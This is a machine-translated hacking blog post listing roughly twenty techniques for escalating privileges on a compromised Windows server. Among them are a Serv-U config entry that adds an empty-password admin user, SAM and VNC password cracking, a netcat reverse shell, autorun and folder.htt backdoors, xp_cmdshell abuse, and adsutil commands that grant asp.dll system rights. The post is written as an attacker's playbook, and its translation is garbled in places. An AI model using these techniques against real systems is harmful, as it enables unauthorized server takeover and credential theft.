Author: Nah Source:
http://blog.77169.com/more.asp?name=atan19a&id=6866
All of the following is the summary of my proposal time, many methods have not been successful, but I did see others successfully.
of. I don't, in addition to the first method of research, others are summarized in other people's experience. I hope to help my friend!
1.Radmin connection method
The condition is that your permissions are big enough, and the other party has no firewall. Encapsulated a RADMIN, run, open the opponent port, then RADMIN
. I have been successful from the rice. The port is open to the other party.
2.paanywhere
C: / Documents and Settings / All Users / Application Data / Symantec / Pcanywhere / Here GIF
File, install PCANywhere locally
3.SAM crack
C: / Winnt / System32 / Config / His SAM Crack
4. SU password capture
C: / Documents and Settings / All Users / "Start" menu / program /
Quote: SERV-U, then view attributes locally, know if the path is read, see if you can jump
After entering, if there is permission to modify servudaemon.ini, add a user, password is empty
[User = wekwen | 1]
PASSWORD =
Homedir = C: /
TIMEOUT = 600
Maintenance = system
Access1 = C: / | rwamelcdp
Access1 = D: / | rwamelcdp
Access1 = f: / | rwamelcdp
SKEYVALUES =
This user has the highest permission, then we can ftp to Quote Site Exec XXX to improve permissions
5.c: / Winnt / System32 / InetSRV / DATA /
Quote: This directory, the same is complete control, what we have to do is uploading the tools of the promotion rights,
Then execute
6.SU overflows
This online tutorial N is not explained in detail.
7. Run CSRIPT
Quote: Run "CScript C: /inetpub/adminscripts/adsutil.vbs Get W3SVC / Inprocessisapiapps"
Relief
Use this cscript c: /inetpub/adminscripts/adsutil.vbs Get W3SVC / INPROCESSISAPIAPPS
View DLL file with privilege: idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll
Add ASP.DLL to the privilege
Asp.dll is placed in c: /winnt/system32/inetsrv/asp.dll (the location of different machine is not necessarily the same)
We now add to CScript Adsutil.vbs SET / W3SVC / InProcessisapiapps "C: /Winnt/System32/idq.dll"
"C: /winnt/system32/inetsrv/httpext.dll" "c: /winnt/system32/inetsrv/httpodbc.dll"
"C: /winnt/system32/inetsrv/ssinc.dll" "c: /winnt/system32/msw3prt.dll" "C: / Winnt / System32
/ ITSRV/ASP.dll "You can use CScript Adsutil.vbs Get / W3SVC / InProcessisapiapps to see if it is added.
8. Script Rights
C: / Documents and Settings / All Users / "Start" Menu / Program / Start "Write BAT, VBS
9.VNC
This is a small flower article Hoho
By default, VNC password is stored in HKCU / Software / Orl / WinVNC3 / Password
We can use VNCX4
Crack it, VNCX4 is very simple, just enter the command line
C: /> vncx4 -w
Then enter each hexadecimal data above, and it will be done after a carriage return is lost.
10.nc rights
Give the other party NC but the condition is that you have enough runtime and then rebound to your computer hoho ok.
11. Guest rights of social engineering
Very simple to see his support, see the password after seeing the account as much as possible, maybe the user password is also the same as he QQ mail.
Molding mobile phone number as much as possible to see Hoho
12.IPC air connection
If the other party is really idiot, if the IPC is good or the weak
13. Replacement Service
Don't you say this? Personally feel quite complex
14.Autorun .inf
Autorun = xxx.exe This = Behind you write Hoho plus read-only, system, hidden properties to which disk can do not believe
He does not run
15.Desktop.ini with Folder.htt
Quote: First, we now establish a folder locally, the name is not important, enter it, right-click in the blank point, select "custom
Folder "(XP seems to be not possible) have been down, by default. After completion, you will see more than two names Folder in this directory.
Setting file frame with Desktop.ini file, (if you can't see, unwind "hidden protected operating system files") then
We found the folder.htt file in the Folder Setting directory, the notepad opened, add the following code in any place: ID = "runit" width = 0 height = 0 type = "Application / X-oleObject" codebase = "Your back door file name"> Then you put your back door file in the Folder Setting directory, upload this directory with Desktop.ini to each other With any directory, you can, just ask the administrator to browse this directory, it has implemented our back door. 16. SU Coverage Rights Install a SU in the local area to cover your own servudaemon.ini files from the servudaemon.ini downloaded from him, heavy Get a SERV-U, so all the configurations above is the same as him. 17. SU forwarding port 43958 This is the local management port of Serv -u. Fpipe.exe upload him, execute the command: fpipe -v -l 3333 -r 43958 127.0.0.1 Means 4444 ports to 43958 ports. Then you can install a serv-u locally, create a new one Server, IP fill in the other party IP, account is the Localadministrator password to #1@'Ak#.1k; 0 @p connection, you can manage him Serv-U 18. SQL account password leakage If the other party has an MSSQL server, we can use the SQL connector to add the administrator account (you can see from the ASP file of his connection database) because MSSQL is the default System permission. Quote: The other party did not delete XP_cmdshell method: using SQLEXEC.exe, fill in the other party IP in the Host column, User and Pass Fill in the username and password you got. Format Select XP_cmdshell "% s". Then click Connect, you can connect it. Enter the CMD command you want in the CMD column. 19.asp.dll Quote: Because asp.dll is placed in c: /winnt/system32/inetsrv/asp.dll (the location of different machine places is not necessarily the same ) We now add to CScript Adsutil.vbs SET / W3SVC / InProcessisapiapps "C: /Winnt/System32/idq.dll" "C: /winnt/system32/inetsrv/httpext.dll" "c: /winnt/system32/inetsrv/httpodbc.dll" "C: /winnt/system32/inetsrv/ssinc.dll" "c: /winnt/system32/msw3prt.dll" "C: / Winnt / System32 /inetsrv/asp.dll " Ok, now you can use the cscript adsutil.vbs get / w3svc / inprocessisapiapps to see if it is added. , Pay attention, get and set in the usage, one is to view one is setting. There is also you want to go on the above. C: / inetpub / adminsscripts> This directory. So if you are an administrator, your machine is used to use this stroke to increase the ASP to System permissions, then, at this time, the method of defense is to put ASP.DLL T out of a privilege, that is, using the set of this command, covering the stuff just now. 20.magic Winmail The premise is that you have a webhell reference: Http://www.eviloctal.com/forum/read.php?tid=3587 here to see 21.DBO ... In fact, the way to improve the permissions will see how everyone uses Hoho to refuel, control the server in the end!
